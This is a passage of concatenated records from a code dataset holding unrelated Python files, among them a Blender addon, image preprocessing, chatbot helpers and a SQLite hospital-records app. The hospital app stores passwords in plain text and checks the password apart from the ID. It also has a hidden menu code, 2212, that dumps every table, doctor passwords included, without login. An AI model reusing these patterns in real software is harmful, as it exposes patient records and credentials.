xaxis=dict(\n tickfont=dict(\n size=14,\n color='rgb(107, 107, 107)'\n )\n ),\n yaxis=dict(\n title='Number of Times Used',\n titlefont=dict(\n size=16,\n color='rgb(107, 107, 107)'\n ),\n tickfont=dict(\n size=14,\n color='rgb(107, 107, 107)'\n )\n )\n)\n\nfig = go.Figure(data=data, layout=layout)\n\npy.image.save_as(fig, filename='part4_viz_image.png')","sub_path":"part4.py","file_name":"part4.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"241890502","text":"# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\n#bl_info = {\n# \"name\": \"Balance Vertex Groups\",\n# \"author\": \"Koilz\",\n# \"version\": (1, 1),\n# \"blender\": (2, 70, 0),\n# \"location\": \"Properties > Data > Vertex Groups > Edit Mode\",\n# \"description\": \"Balance the weight of two vertex groups\",\n# \"warning\": \"\",\n# \"wiki_url\": \"http://wiki.blender.org/index.php/Extensions:2.6/Py/Scripts/Rigging/VG_Oppose\",\n# \"category\": \"Rigging\"}\n\nimport bpy\n\nbpy.types.Scene.vgai2 = bpy.props.StringProperty(name=\"Vertex Group Index 2\", description=\"Second active index for vertex groups\", default='')\n\ndef main(context):\n\n # save vertex_group\n vg_previous = context.active_object.vertex_groups.active_index\n\n # save weight\n vg_weight_previous = context.scene.tool_settings.vertex_group_weight\n\n # assign weight\n bpy.ops.object.vertex_group_assign()\n\n # oppose vertex group\n context.active_object.vertex_groups.active_index = context.active_object.vertex_groups[context.scene.vgai2].index\n\n # oppose weight\n context.scene.tool_settings.vertex_group_weight = 1-vg_weight_previous\n\n # assign weight\n bpy.ops.object.vertex_group_assign()\n\n # restore vertex group\n context.active_object.vertex_groups.active_index = vg_previous\n\n # restore weight\n context.scene.tool_settings.vertex_group_weight = vg_weight_previous\n\nclass OT_BALANCE_VG(bpy.types.Operator):\n \"\"\"Balance the weight of two vertex groups\"\"\"\n bl_idname = \"object.vertex_group_balance\"\n bl_label = \"Balance\"\n\n @classmethod\n def poll(cls, context):\n return context.active_object is not None\n\n def execute(self, context):\n main(context)\n return {'FINISHED'}\n\ndef add_vertex_group_tools(self, context):\n\n layout = self.layout\n\n ob = context.object\n\n if ob.vertex_groups and ob.mode == 'EDIT':\n\n row = layout.row()\n row.operator(\"object.vertex_group_balance\")\n row.prop_search(context.scene, \"vgai2\", context.active_object, \"vertex_groups\", text=\"\")\n\ndef register():\n bpy.utils.register_class(OT_BALANCE_VG)\n bpy.types.DATA_PT_vertex_groups.append(add_vertex_group_tools)\n\ndef unregister():\n bpy.utils.unregister_class(OT_BALANCE_VG)\n bpy.types.DATA_PT_vertex_groups.remove(add_vertex_group_tools)\n\nif __name__ == \"__main__\":\n register()\n\n","sub_path":"scripts/addons_extern/metatool_addon/vert_balance_vertex_groups.py","file_name":"vert_balance_vertex_groups.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"279260672","text":"import os\nimport logging\n\nos.chdir(r'G:\\cnx\\projects\\udacity\\Self-Driving Cars\\1 - Computer Vision, Deep Learning and Sensor\\Project 3 - Traffic Sign Classifier\\local')\n\nimport Display\n\nFORMAT = '%(module)-15s:%(levelname)-5s:%(message)s'\nlogging.basicConfig(format=FORMAT, level=logging.DEBUG)\nlogging.getLogger(\"display\").setLevel(logging.DEBUG)\n\nlogging.info(\"Main file\")\nlogging.debug(\"Test\")\n\ninput = r'G:/cnx/projects/udacity/Self-Driving Cars/1 - Computer Vision, Deep Learning and Sensor/Project 2 - Advanced Lane Finding/test_images'\noutput = r'G:/test/'\na = Display.Image(input, output)\na.run()\n","sub_path":"Self-Driving Cars/1 - Computer Vision, 
Deep Learning and Sensor/Project 3 - Traffic Sign Classifier/local/display_test.py","file_name":"display_test.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"498384341","text":"import getpass\r\nimport sqlite3\r\nconnection=sqlite3.connect('hospital.db')\r\ncursor=connection.cursor()\r\nerror=1\r\nfrom os import system, name\r\ndef screen_clear():\r\n if name == 'nt':\r\n _ = system('cls')\r\n else:\r\n _ = system('clear')\r\ncursor.execute(\"\"\"select count(name) from sqlite_master where type='table' and name='doctor'\"\"\")\r\nif cursor.fetchone()[0]==0:\r\n cursor.execute(\"\"\"CREATE TABLE doctor ( \r\n d_id number primary key, \r\n dnamedfirst VARCHAR2(20), \r\n dnamedlast VARCHAR2(30), \r\n password varchar2(20) not null,\r\n speciality varchar2(40) not null,\r\n shift varchar2(10) not null,\r\n phone number(10) not null);\"\"\")\r\ncursor.execute(\"\"\"select count(name) from sqlite_master where type='table' and name='patient'\"\"\")\r\nif cursor.fetchone()[0]==0:\r\n cursor.execute(\"\"\"CREATE TABLE patient ( \r\n p_id number primary key, \r\n pfirst VARCHAR2(20), \r\n pdlast VARCHAR2(30), \r\n City varchar2(20) not null,\r\n DOB date not null,\r\n age number not null,\r\n DOA date not null,\r\n number number(10) not null);\"\"\")\r\n cursor.execute(\"\"\"CREATE TABLE virus ( \r\n p_id number not null, \r\n dname VARCHAR2(20) primary key,\r\n vname VARCHAR2(20), \r\n treatment VARCHAR2(50), \r\n symptoms varchar2(50) not null);\"\"\")\r\n cursor.execute(\"\"\"CREATE TABLE bacteria ( \r\n p_id number not null, \r\n dname VARCHAR2(20) primary key,\r\n bname VARCHAR2(20), \r\n treatment VARCHAR2(50), \r\n symptoms varchar2(50) not null);\"\"\")\r\n cursor.execute(\"\"\"CREATE TABLE injury ( \r\n p_id number not null, \r\n iname VARCHAR2(20) primary key,\r\n idiagnosis VARCHAR2(50), \r\n type varchar2(50) not null);\"\"\")\r\n cursor.execute(\"\"\"insert into patient values(101,'Mohit','Nayak','Bangalore','15-March-2001',18,'08-March-2020',9078435952)\"\"\")\r\n cursor.execute(\"\"\"insert into patient values(102,'Anikiat','Saraf','Kolkata','22-Dec-2000','19','15-Feb-2020',9674825476)\"\"\")\r\n cursor.execute(\"\"\"insert into patient values(103,'Rishank','Pratik','Orissa','22-Dec-2001','18','19-Nov-2015',9117854569)\"\"\")\r\n cursor.execute(\"\"\"insert into patient values(104,'Risav','Jana','Nepal','06-Jan-2001',18,'25-Oct-2010',7854963284)\"\"\")\r\n cursor.execute(\"\"\"insert into patient values(105,'Wilson','Vidyut','Mumbai','23-Nov-2001',18,'23-Nov-2005',7854129645)\"\"\")\r\n cursor.execute(\"\"\"insert into patient values(106,'Dinesh','Sharma','Rajasthan','23-Feb-2000',20,'23-Feb-2000',8476423858)\"\"\")\r\n cursor.execute(\"\"\"insert into virus values(103,'Ebola','Ebov','Oxygen Therapy, IV Fluids','Muscle Pain, Fever, Bleeding')\"\"\")\r\n cursor.execute(\"\"\"insert into virus values(105,'Measles','Paramyxo','Vitamin A','Cough, Skin Rash')\"\"\")\r\n cursor.execute(\"\"\"insert into bacteria values(101,'TB','Mycobacterium','Antibiotics','Cough and Sneezes')\"\"\")\r\n cursor.execute(\"\"\"insert into bacteria values(106,'Cholera','Vibrio','IV Fluids, Antibiotics','Seizures, Diarrhoea')\"\"\")\r\n cursor.execute(\"\"\"insert into injury values(102,'Hair line Fracture','Plaster, Pain Killer','Toe Fracture')\"\"\")\r\n cursor.execute(\"\"\"insert into injury values(104,'bullet wound','Removal of Bullet','Wound')\"\"\")\r\n print(\"Databse created successfully\")\r\n 
\r\nelse:\r\n e=1\r\n while e!=0:\r\n e=int(input(\"1. Sign In\\n2. Create a New Doctor Account\\n\"))\r\n if e==2:\r\n did=int(input('\\nEnter id - '))\r\n dnf=input('Enter first name - ')\r\n dnl=input('Enter last name - ')\r\n pas=getpass.getpass('Enter password - ')\r\n spec=input('Enter speciality - ')\r\n shf=input('Enter working shift - ')\r\n ph=int(input('Enter phone number - '))\r\n cursor.execute(\"\"\"insert into doctor values(?,?,?,?,?,?,?)\"\"\",(did,dnf,dnl,pas,spec,shf,ph))\r\n screen_clear()\r\n e=1\r\n elif e==1:\r\n while error==1:\r\n i=input(\"\\nEnter your ID - \")\r\n p=getpass.getpass(\"Enter your Password - \")\r\n cursor.execute(\"\"\"select count(d_id) from doctor where d_id=(?)\"\"\",(i,))\r\n if cursor.fetchone()[0]==1:\r\n cursor.execute(\"\"\"select count(password) from doctor where password=?\"\"\",(p,))\r\n if cursor.fetchone()[0]==1:\r\n print(\"\\nSign in successful!\")\r\n screen_clear()\r\n error=0\r\n e=0\r\n r=1\r\n cursor.execute(\"\"\"select d_id,dnamedfirst,dnamedlast,speciality,shift,phone from doctor where d_id=(?)\"\"\",(i,))\r\n for row in cursor.fetchall():\r\n print(\"ID -\",row[0],\" Name -\",row[1], row[2],\" Speciality -\",row[3],\"\\nShift -\",row[4],\" Phone Number -\",row[5])\r\n while r!=0:\r\n print(\"\\n1. View Patient details\\n2. Add a New Patient\\n3. Delete Patient Details\\n0. Exit\")\r\n r=int(input())\r\n if r==1:\r\n access=input(\"\\nEnter Patient ID:- \")\r\n cursor.execute(\"\"\"select count(*) from patient where p_id=(?)\"\"\",(access,))\r\n if cursor.fetchone()[0]!=0:\r\n cursor.execute(\"\"\"select * from patient where p_id=(?)\"\"\",(access,))\r\n print(\"\\nPatient Details - \")\r\n for row in cursor.fetchall():\r\n print(\"Id: \", row[0])\r\n print(\"First Name: \", row[1])\r\n print(\"Last Name: \", row[2])\r\n print(\"City: \", row[3])\r\n print(\"Date of Birth: \", row[4])\r\n print(\"Age: \", row[5])\r\n print(\"Date of Admission: \", row[6])\r\n print(\"\\nDiagnosis Report - \")\r\n cursor.execute(\"\"\"select count(*) from virus where p_id=(?)\"\"\",(access,))\r\n if cursor.fetchone()[0]!=0:\r\n cursor.execute(\"\"\"select * from virus where p_id=(?)\"\"\",(access,))\r\n for row in cursor.fetchall():\r\n print(\"Id: \", row[0])\r\n print(\"Disease Name: \", row[1])\r\n print(\"Virus Name: \", row[2])\r\n print(\"Treatment: \", row[3])\r\n print(\"Symptoms: \", row[4])\r\n print(\"\\n\")\r\n cursor.execute(\"\"\"select count(*) from bacteria where p_id=(?)\"\"\",(access,))\r\n if cursor.fetchone()[0]!=0:\r\n cursor.execute(\"\"\"select * from bacteria where p_id=(?)\"\"\",(access,))\r\n for row in cursor.fetchall():\r\n print(\"Id: \", row[0])\r\n print(\"Disease Name: \", row[1])\r\n print(\"Bacteria Name: \", row[2])\r\n print(\"Treatment: \", row[3])\r\n print(\"Symptoms: \", row[4])\r\n print(\"\\n\")\r\n cursor.execute(\"\"\"select count(*) from injury where p_id=(?)\"\"\",(access,))\r\n if cursor.fetchone()[0]!=0:\r\n cursor.execute(\"\"\"select * from injury where p_id=(?)\"\"\",(access,))\r\n for row in cursor.fetchall():\r\n print(\"Id: \", row[0])\r\n print(\"Injury Name: \", row[1])\r\n print(\"Diagnosis Name: \", row[2])\r\n print(\"Type: \", row[3])\r\n print(\"\\n\")\r\n else:\r\n print(\"Incorrect Patient id\")\r\n elif r==2:\r\n pid=int(input('\\nEnter id - '))\r\n pnf=input('Enter first name - ')\r\n pnl=input('Enter last name - ')\r\n pcity=input('Enter city - ')\r\n pdob=input('Enter date of birth - ')\r\n page=int(input('Enter age - '))\r\n pdoa=input('Enter date of admission - ')\r\n 
pnum=int(input('Enter phone number - '))\r\n cursor.execute(\"\"\"insert into patient values(?,?,?,?,?,?,?,?)\"\"\",(pid,pnf,pnl,pcity,pdob,page,pdoa,pnum))\r\n print(\"\\n1. Virus\\n2. Bacteria\\n3. Injury\")\r\n m=int(input())\r\n if m==1:\r\n dname=input(\"\\nEnter disease name - \")\r\n bname=input(\"Enter virus name - \")\r\n treatment=input(\"Enter treatment - \")\r\n symptoms=input(\"Enter symptoms - \")\r\n cursor.execute(\"\"\"insert into virus values(?,?,?,?,?)\"\"\",(pid,dname,bname,treatment,symptoms))\r\n elif m==2:\r\n dname=input(\"\\nEnter disease name - \")\r\n bname=input(\"Enter bacteria name - \")\r\n treatment=input(\"Enter treatment - \")\r\n symptoms=input(\"Enter symptoms - \")\r\n cursor.execute(\"\"\"insert into bacteria values(?,?,?,?,?)\"\"\",(pid,dname,bname,treatment,symptoms))\r\n elif m==3:\r\n iname=input(\"\\nEnter injury name - \")\r\n idiag=input(\"Enter diagnosis - \")\r\n itype=input(\"Enter injury type - \")\r\n cursor.execute(\"\"\"insert into injury values(?,?,?,?)\"\"\",(pid,iname,idiag,itype))\r\n print(\"\\nPatient Added\")\r\n connection.commit()\r\n elif r==3:\r\n access=input(\"\\nEnter Patient ID:- \")\r\n cursor.execute(\"\"\"select count(*) from patient where p_id=(?)\"\"\",(access,))\r\n if cursor.fetchone()[0]!=0:\r\n cursor.execute(\"\"\"delete from patient where p_id=(?)\"\"\",(access,))\r\n cursor.execute(\"\"\"select count(*) from virus where p_id=(?)\"\"\",(access,))\r\n if cursor.fetchone()[0]!=0:\r\n cursor.execute(\"\"\"delete from virus where p_id=(?)\"\"\",(access,))\r\n cursor.execute(\"\"\"select count(*) from bacteria where p_id=(?)\"\"\",(access,))\r\n if cursor.fetchone()[0]!=0:\r\n cursor.execute(\"\"\"delete from bacteria where p_id=(?)\"\"\",(access,))\r\n cursor.execute(\"\"\"select count(*) from injury where p_id=(?)\"\"\",(access,))\r\n if cursor.fetchone()[0]!=0:\r\n cursor.execute(\"\"\"delete from injury where p_id=(?)\"\"\",(access,))\r\n else:\r\n print(\"Incorrect Patient id Patient does not exist\")\r\n print(\"\\nPatient Deleted\")\r\n connection.commit()\r\n elif r==0:\r\n break\r\n else:\r\n print(\"Incorrect passoword. Please retry \")\r\n else:\r\n print(\"Incorrect User ID. 
Please retry\")\r\n                    break\r\n        elif e==2212:\r\n            cursor.execute(\"\"\"select * from doctor\"\"\")\r\n            print(cursor.fetchall())\r\n            cursor.execute(\"\"\"select * from virus\"\"\")\r\n            print(cursor.fetchall())\r\n            cursor.execute(\"\"\"select * from bacteria\"\"\")\r\n            print(cursor.fetchall())\r\n            cursor.execute(\"\"\"select * from injury\"\"\")\r\n            print(cursor.fetchall())\r\n            break\r\nconnection.commit()\r\nconnection.close()\r\nprint(\"\")\r\ndef progress(status, remaining, total):\r\n    print(f'Copied {total-remaining} of {total} pages...')\r\n\r\nbackupCon = None\r\nsqliteCon = None\r\ntry:\r\n    sqliteCon = sqlite3.connect('hospital.db')\r\n    backupCon = sqlite3.connect('hospital_backup.db')\r\n    with backupCon:\r\n        sqliteCon.backup(backupCon, pages=1, progress=progress)\r\n        print(\"backup successful\")\r\nexcept sqlite3.Error as error:\r\n    print(\"Error while taking backup: \", error)\r\nfinally:\r\n    if backupCon:\r\n        backupCon.close()\r\n    if sqliteCon:\r\n        sqliteCon.close()\r\n","sub_path":"Doctor.py","file_name":"Doctor.py","file_ext":"py","file_size_in_byte":13109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"413373878","text":"import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plot\nimport os\nimport json\nimport copy\nimport time\nimport shutil\nfrom dataUtils import shutildata\n\n\ndef cut(img):\n    # img = cv2.adaptiveThreshold(img, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 17, 6)\n    img = copy.deepcopy(img)\n    img = np.asarray(img)\n    img[img > 127] = 255\n    img[img <= 127] = 1\n    img[img == 255] = 0\n\n    cols = np.sum(img, 0)\n    rows = np.sum(img, 1)\n    # print(cols)\n\n    x1 = 0\n    y1 = 0\n    y2, x2 = img.shape\n    y2 -= 1\n    x2 -= 1\n\n    for i in range(len(cols)):\n        if cols[i] > 0:\n            x1 = i\n            break\n\n    for i in range(len(cols)):\n        if cols[len(cols) - 1 - i] > 0:\n            x2 = len(cols) - 1 - i\n            break\n\n    for i in range(len(rows)):\n        if rows[i] > 0:\n            y1 = i\n            break\n\n    for i in range(len(rows)):\n        if rows[len(rows) - 1 - i] > 0:\n            y2 = len(rows) - 1 - i\n            break\n\n    return x1, x2, y1, y2\n\n\ndef resize(img):\n    width, height = img.shape\n    if width > height:\n        wider = (width - height) // 2\n        img=cv2.copyMakeBorder(img,0,0,wider,wider,cv2.BORDER_CONSTANT, value=[255, 255, 255])\n\n    elif height>width:\n        wider=(height - width)//2\n        img=cv2.copyMakeBorder(img, wider, wider,0,0, cv2.BORDER_CONSTANT, value=[255, 255, 255])\n    return img\n\n# a-z\ndef makeOringinData(path):\n    datapath=\"E:\\\\PythonProject\\\\CNN_Pinyin/Data/originData/\"\n    if os.path.exists(datapath):\n        shutil.rmtree(datapath)\n\n    os.mkdir(datapath)\n\n    with open('num_char.json', 'r') as f:\n        dict = json.loads(f.read())\n\n    for i in os.listdir(path):\n        char = i\n        pre_name=dict[str(char)]+'_'\n        print(pre_name)\n        imgPath = path + char + '/'\n        count = 0\n        savaPath = datapath+ char + '/'\n        print(savaPath)\n\n        dirlist=os.listdir(imgPath)\n        if len(dirlist) == 0:\n            continue\n\n        if os.path.exists(savaPath):\n            shutil.rmtree(savaPath)\n\n        if not os.path.exists(savaPath):\n            os.mkdir(savaPath)\n\n        for i in dirlist:\n            img = cv2.imread(imgPath + i, 0)\n            temp=img\n            print(i)\n            try:\n                width,height=img.shape\n            except:\n                continue\n            if width != height:\n                x1, x2, y1, y2 = cut(img)\n                if x1 == x2 or y1 == y2:\n                    continue\n                print(x1, x2, y1, y2)\n                temp = img[y1:y2, x1:x2]\n                temp=resize(temp)\n            temp = cv2.resize(temp, (28, 28))\n\n            cv2.imwrite(savaPath + pre_name + str(count) + '.jpg', temp)\n            count += 1\n\n\nif __name__ == '__main__':\n\n    path = 'C:\\\\Users\\\\MarkXu\\\\Desktop\\\\dst\\\\chars/'\n    makeOringinData(path)\n    
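# next, split the generated originData images into train/test folders via the dataUtils helper imported above\n    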
shutildata('Data/originData/', 'Data/train/', 'Data/test/')\n\n\n\n","sub_path":"MakeData.py","file_name":"MakeData.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"607256855","text":"import numpy as np\nimport mercantile as m\n\ndef single_point(row,bound,deltax,deltay):\n\tfactorx = (row[0] - bound.west) / deltax\n\tfactory = (bound.north - row[1]) / deltay\n\n\txval = int(factorx * 4096)\n\tyval = int(factory * 4096)\n\n\treturn [xval,yval]\n\ndef get_convert_values(key):\n\tz,x,y = str.split(key,'/')[1:]\n\n\tbound = m.bounds(m.Tile(int(x), int(y), int(z)))\n\tdeltax,deltay = (bound.east - bound.west),(bound.north - bound.south)\n\n\treturn bound,deltax,deltay\n\n\ndef convert_all(key,coordss):\n\t#newlist = []\n\tbound,deltax,deltay = get_convert_values(key)\n\t#for coords in coordss:\n\treturn [[single_point(i,bound,deltax,deltay) for i in coords] for coords in coordss]\n\t#return newlist\n","sub_path":"python_vtile/coords.py","file_name":"coords.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"579115373","text":"from setuptools import setup\n\nMAJOR = 0\nMINOR = 1\nRELEASE = 5\n\nsetup(\n name=\"Thalassa\",\n version=\"%s.%s.%s\" % (MAJOR, MINOR, RELEASE),\n description=\"TBD\",\n url=\"https://github.com/Arrekin/Thalassa\",\n author=\"Daniel Misior\",\n packages=[\n \"thalassa\",\n \"thalassa.database\",\n ],\n install_requires=[\n \"Twisted\",\n \"sqlalchemy\",\n \"greenstalk\"\n ],\n)\n","sub_path":"ThalassaCore/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"395824898","text":"# import speech_recognition as sr\nimport os\n# from gtts import gTTS\nimport warnings\nimport calendar\nimport random\nimport wikipedia\nimport datetime\n# from playsound import playsound\nimport pytz\nimport autocorrect\n\n\n# ignoring warnings\nwarnings.filterwarnings('ignore')\n\nspell = autocorrect.Speller(lang='en')\n\n# # recording audio and return it as a string\n# def record_audio():\n\n# # record audio\n# r = sr.Recognizer() # Recognizer object\n\n# # opening mic to record\n# with sr.Microphone() as source:\n# print('Say Something')\n# audio = r.listen(source)\n\n# data = \"\"\n# try:\n# data = r.recognize_google(audio)\n# print(data)\n# except sr.UnknownValueError: # check for unknown errors\n# return ('Speech not recognised')\n# except sr.RequestError:\n# return ('You got disconnected, please try again !')\n\n# return data\n\n# # function to convert text to speech\n# def assistant_response(text):\n# if text == \"\":\n# text = \"Sorry\"\n# t_t_s = gTTS(text=text, lang = 'en', slow = False)\n\n# # getting current path\n# current_path = os.path.realpath(__file__)\n# # saving audio\n# t_t_s.save(current_path[:-9].replace('\\\\','/') + \"/audio_response/assistant_reply.mp3\")\n\n# playsound(current_path[:-9].replace('\\\\','/') + \"/audio_response/assistant_reply.mp3\")\n\n\n\n# check it to wake up\ndef wake_up(text):\n wake_words = [\"hey buddy\",\"hi buddy\",\"hello buddy\",\"listen buddy\"]\n for word in wake_words:\n if word in text.lower():\n return True\n\n return False\n\n# get date\ndef getDate():\n\n now = datetime.datetime.now(pytz.timezone('Asia/Kolkata'))\n my_date = datetime.datetime.today()\n weekday = calendar.day_name[my_date.weekday()]\n month = 
now.strftime(\"%B\")\n\n date_today = now.strftime(\"%d\")\n\n if date_today == '1':\n date_today += 'st'\n elif date_today == '2':\n date_today += 'nd'\n elif date_today == '3':\n date_today += 'rd'\n else:\n date_today += 'th'\n\n return f\"Today is {weekday} ,{month} {(date_today)} {now.year}\"\n\n# get time\ndef getTime():\n\n now = datetime.datetime.now(pytz.timezone('Asia/Kolkata'))\n hr = now.hour\n minute = now.minute\n mer = \"a.m.\"\n\n if hr >= 12:\n mer = 'p.m.'\n hr = int(hr) - 12\n \n\n return f\"Its {hr} : {minute} {mer}\"\n\n# greetings\ndef greeting(text):\n\n # user inputs\n greets = ['hi','hello','hey','greetings','wassup','what\\'s up','whats up','hello','hey there']\n\n # buddy response\n my_greets = ['hi','hello','hey','greetings','wassup','what\\'s up','whats up','hello','hey there']\n\n for word in greets:\n if word in text.lower():\n return random.choice(my_greets) + '.'\n\n return ''\n\ndef end_conv(text):\n\n # user inputs\n greets = ['bye','see you','goodbye','good bye','exit','leave','go','tata','see ya']\n\n # buddy response\n my_greets = ['bye','see you later',\"see you soon\",\"your are really cool\",\"will talk to you later\",\"byeee\",'goodbye','good bye','tata','see ya']\n\n for word in greets:\n if word in text.lower():\n return random.choice(my_greets) + '.'\n\n return ''\n\ndef getName(text):\n wordList = text.split()\n return text\n for i in range(len(wordList)):\n if i+3 <= len(wordList) - 1 and wordList[i].lower() == 'who' and wordList[i] == 'is':\n return wordList[i+2] + ' ' + wordList[i+3]\n elif i+2 <= len(wordList) - 1 and wordList[i].lower() == 'who' and wordList[i] == 'is':\n return wordList[i+2]\n\ndef spell_check(word_list):\n # checked_list = []\n for i in range(len(word_list)):\n word_list[i] = spell(word_list[i])\n return \" \".join(word_list)\n\n# search for keywords\n# def wiki_search(text):\n\n\ndef get_emoji():\n\n # user inputs\n my_icons=[ \"😀\", \"😃\", \"😄\", \"😁\", \"😆\", \"😅\", \"😂\", \"🤣\", \"☺️\", \"😊\", \"😇\", \"🙂\", \"🙃\", \"😉\", \"😌\", \"😍\", \"🥰\", \"😘\", \"😗\", \"😙\", \"😚\", \"😋\", \"😛\", \"😝\", \"😜\", \"🤪\", \"🤨\", \"🧐\", \"🤓\", \"😎\", \"🤩\", \"🥳\", \"😏\", \"😒\", \"😞\", \"😔\", \"😟\", \"😕\", \"🙁\", \"☹️\", \"😣\", \"😖\", \"😫\", \"😩\", \"🥺\", \"😢\", \"😭\", \"😤\", \"😠\", \"😡\", \"🤬\", \"🤯\", \"😳\", \"🥵\", \"🥶\", \"😱\", \"😨\", \"😰\", \"😥\", \"😓\", \"🤗\", \"🤔\", \"🤭\", \"🤫\", \"🤥\", \"😶\", \"😐\", \"😑\", \"😬\", \"🙄\", \"😯\", \"😦\", \"😧\", \"😮\", \"😲\", \"🥱\", \"😴\", \"🤤\", \"😪\", \"😵\", \"🤐\", \"🥴\", \"🤢\", \"🤮\", \"🤧\", \"😷\", \"🤒\", \"🤕\", \"🤑\", \"🤠\", \"😈\", \"👿\", \"👹\", \"👺\", \"🤡\", \"💩\", \"👻\", \"💀\", \"☠️\", \"👽\", \"👾\", \"🤖\", \"🎃\", \"😺\", \"😸\", \"😹\", \"😻\", \"😼\", \"😽\", \"🙀\", \"😿\", \"😾\" ]\n \n\n return random.choice(my_icons)\n\n\n\n\n ","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"584855251","text":"from __future__ import print_function, division\nimport numpy as np\nfrom torch.utils.data import Dataset, DataLoader\nfrom game2048.game import Game\nfrom game2048.displays import Display\n\n\nclass myDataset(Dataset):\n\n def __init__(self):\n self.board = []\n self.direction = []\n\n def add(self, getboard, getdirection):\n self.board.append(getboard)\n self.direction.append(getdirection)\n\n def __len__(self):\n return len(self.board)\n\n def __getitem__(self, idx):\n myBoard = self.board[idx]\n myDirection = self.direction[idx]\n return myBoard, 
myDirection\n\n\ndef single_run(size, ds, AgentClass, **kwargs):\n game = Game(size, 2048)\n agent = AgentClass(game, display=Display(), **kwargs)\n agent.play(dataset=ds, verbose=False, train=1)\n\n\nif __name__ == '__main__':\n GAME_SIZE = 4\n N_TESTS = 1000\n\n '''====================\n Use your own agent here.'''\n from game2048.agents import ExpectiMaxAgent as TestAgent\n '''===================='''\n\n scores = []\n dataset = myDataset()\n for _ in range(N_TESTS):\n\n single_run(GAME_SIZE, ds=dataset, AgentClass=TestAgent)\n np.save(\"b16\", dataset.board)\n np.save(\"d16\", dataset.direction)\n print(len(dataset))\n\n","sub_path":"2048/game2048/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"34750387","text":"import mysql.connector\nimport pickle\n\nwith open(\"ward.pickle\",\"rb\") as picklefile:\n database_name=pickle.load(picklefile)['id']\nprint(database_name)\n\nclass database:\n def __init__(self,hostname,user,dbase,pword=\"\"):\n try:\n self.mydb=mysql.connector.connect(\n host=hostname,\n user=user,\n password=pword,\n )\n except Exception as e:\n print(\"Not Connected to database.\")\n print(e)\n\n def insertintowadatable(self,name,address,about):\n #INSERT INTO `smartward`.`ward_registration` (ID,Municipality,WardNo,State,Address,Phone,Email,IP_Address,LogoPath,Password) VALUES('1','A','B','2','sgjkf','8935734','C','576','231','123')\n mycursor=self.mydb.cursor()\n sql=\"INSERT INTO wada(wada_name,wada_address,wada_info) VALUES (%s,%s,%s)\"\n val=(name,address,about) \n mycursor.execute(sql,val) \n self.mydb.commit()\n print(\"insert successful.\")\n mycursor.close()\n\nclass database_signinwindow(database):\n def __init__(self,hostname,user,dbase,pword=\"\"):\n super().__init__(hostname,user,dbase,pword)\n self.mycursor=self.mydb.cursor()\n\n def createWardTable(self):\n try:\n #\"CREATE TABLE `departments` (\"\" `dept_no` char(4) NOT NULL,\"\" `dept_name` varchar(40) NOT NULL,\"\" PRIMARY KEY (`dept_no`), UNIQUE KEY `dept_name` (`dept_name`)\"\") ENGINE=InnoDB\"\n sql=\"CREATE TABLE `smartward`.`ward_registration` ( `ID` VARCHAR(30) NOT NULL , `Municipality` VARCHAR(75) NOT NULL , `WardNo` VARCHAR(5) NOT NULL , `State` VARCHAR(5) NOT NULL , `Address` VARCHAR(150) NOT NULL , `Phone` VARCHAR(15) NOT NULL , `Email` VARCHAR(50) NOT NULL , `IP_Address` VARCHAR(15) NOT NULL , `LogoPath` VARCHAR(150) NOT NULL , `Password` VARCHAR(16) NOT NULL , PRIMARY KEY (`ID`)) ENGINE = InnoDB\"\n self.mycursor.execute(sql)\n self.mydb.commit()\n print(\"table created.\")\n self.mycursor.close()\n except Exception as e:\n print(\"table already exists\")\n\n def checkValid(self,municipality,ward):\n sql=\"SELECT * FROM `smartward`.`ward_registration` WHERE Municipality=%s AND WardNo=%s\"\n self.mycursor.execute(sql,(municipality,ward))\n if(self.mycursor.fetchall()):\n return False\n return True\n\n def checkEmailValid(self,email):\n sql=\"SELECT * FROM `smartward`.`ward_registration` WHERE Email=%s\"\n self.mycursor.execute(sql,(email,))\n if(self.mycursor.fetchall()):\n return False\n return True\n\n def InsertIntoward_registrationTable(self,id,municipality,wardno,state,address,phone,email,ip,logopath,pword):\n try:\n sql=\"INSERT INTO `smartward`.`ward_registration` (ID,Municipality,WardNo,State,Address,Phone,Email,IP_Address,LogoPath,Password) VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\n val=(id,municipality,wardno,state,address,phone,email,ip,logopath,pword)\n 
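# the %s placeholders are bound by the driver, keeping user input out of the SQL string itself\n            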
